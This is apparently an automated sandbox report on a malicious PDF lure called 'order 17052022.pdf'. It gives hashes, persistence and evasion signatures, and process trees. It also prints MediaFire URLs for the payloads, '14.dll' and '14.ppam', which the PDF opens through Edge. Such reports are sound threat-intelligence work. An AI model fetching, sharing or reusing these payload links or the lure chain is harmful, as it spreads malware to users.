Analysis
-
max time kernel
111s -
max time network
113s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
17-05-2022 19:24
Behavioral task
behavioral1
Sample
order 17052022.pdf
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
order 17052022.pdf
Resource
win10v2004-20220414-en
General
-
Target
order 17052022.pdf
-
Size
30KB
-
MD5
f7da10c601fc5c0c2caef9f4e06508ad
-
SHA1
b1f40f4752866c30fbd6654f4844d13ae2958946
-
SHA256
0bf9fd42a0dc842dfe8ad1d5fdaa3f74e5e2ff602887dcfdbc14466f51eef6e0
-
SHA512
999c1cf265bd24b51a75bbe6651b2c5b7637b8df6e89a5740e31b6d9e9a74bff19c5ddd8fb445d42cfbe01f26c92db0afa273480f85895a83530ed68a9a392c3
Malware Config
Extracted
https://www.mediafire.com/file/ivgr6qe4jfzd1w9/14.dll/file
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
ddond.compid process 4992 ddond.com -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\cc12dc4b-a323-437b-9e64-571415a0833e.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220517212452.pma setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exePOWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
msedge.exePOWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 5860 taskkill.exe 5928 taskkill.exe 3828 taskkill.exe -
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 2 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings msedge.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 5572 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 30 IoCs
Processes:
msedge.exemsedge.exeAcroRd32.exemsedge.exemsedge.exemsedge.exeidentity_helper.exepid process 1188 msedge.exe 1188 msedge.exe 1748 msedge.exe 1748 msedge.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 4500 msedge.exe 4500 msedge.exe 5176 msedge.exe 5176 msedge.exe 5252 msedge.exe 5252 msedge.exe 5360 identity_helper.exe 5360 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
msedge.exepid process 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe -
Suspicious use of FindShellTrayWindow 20 IoCs
Processes:
AcroRd32.exemsedge.exepid process 64 AcroRd32.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe 4500 msedge.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
AcroRd32.exeAdobeARM.exePOWERPNT.EXEpid process 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 64 AcroRd32.exe 5176 AdobeARM.exe 5572 POWERPNT.EXE 5572 POWERPNT.EXE 5572 POWERPNT.EXE 5572 POWERPNT.EXE 5572 POWERPNT.EXE 5572 POWERPNT.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
AcroRd32.exeRdrCEF.exedescription pid process target process PID 64 wrote to memory of 216 64 AcroRd32.exe RdrCEF.exe PID 64 wrote to memory of 216 64 AcroRd32.exe RdrCEF.exe PID 64 wrote to memory of 216 64 AcroRd32.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 3648 216 RdrCEF.exe RdrCEF.exe PID 64 wrote to memory of 3484 64 AcroRd32.exe msedge.exe PID 64 wrote to memory of 3484 64 AcroRd32.exe msedge.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe PID 216 wrote to memory of 4336 216 RdrCEF.exe RdrCEF.exe
Processes
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\order 17052022.pdf"1⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140432⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=56EC53DF2B66CBC934083B75DF6946BE --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=844C07BE9E116AF808E5ECFD12437D25 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=844C07BE9E116AF808E5ECFD12437D25 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:13⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=81E7FF4BEE639EC88E4D66CADBF1CFA2 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=81E7FF4BEE639EC88E4D66CADBF1CFA2 --renderer-client-id=4 --mojo-platform-channel-handle=2184 --allow-no-sandbox-job /prefetch:13⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FED20838FB90D99B288D239A6DEDE4A5 --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6D09F45E2CD1C838820AD835962F84C0 --mojo-platform-channel-handle=2584 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=23538A52D9CE8B9B15013A64AF1D2646 --mojo-platform-channel-handle=1956 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/v4sy07laokbd5at/14.ppam/file2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb62aa46f8,0x7ffb62aa4708,0x7ffb62aa47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,18208547420295663251,11644268674043182771,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,18208547420295663251,11644268674043182771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/v4sy07laokbd5at/14.ppam/file2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb62aa46f8,0x7ffb62aa4708,0x7ffb62aa47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2984 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4492 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4072 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5928 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,10112653691424254004,2794949916676608801,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
